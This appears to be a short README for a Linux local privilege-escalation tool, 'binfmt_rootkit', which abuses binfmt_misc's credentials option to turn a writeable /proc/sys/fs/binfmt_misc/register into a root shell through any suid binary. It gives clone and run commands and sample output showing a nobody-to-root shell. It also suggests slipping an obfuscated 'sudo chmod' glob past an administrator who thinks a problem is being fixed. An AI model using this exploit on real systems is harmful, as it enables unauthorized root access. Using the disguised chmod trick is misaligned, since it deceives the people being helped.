Kernel Support for miscellaneous (your favourite) exploits
No breakthrough here, just some trivia involving binary formats.
Poor man's rootkit, leverage binfmt_misc's credentials option to
escalate privilege through any suid binary (and to get a root shell) if
/proc/sys/fs/binfmt_misc/register
is writeable.
$ git clone https://github.com/plcp/binfmt_misc
$ cd binfmt_misc
$ ./binfmt_rootkit --help
Usage: ./binfmt_rootkit
Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
note that it must be enforced by any other mean before your try this, for
example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave
is thinking that you are fixing his problem.
Cheap nobody to root is cheap:
$ sudo -u nobody ./binfmt_rootkit
uid=0(root) euid=0(root)
sh-4.4#
Tested on Linux 4.9.6-1
and working with major distributions.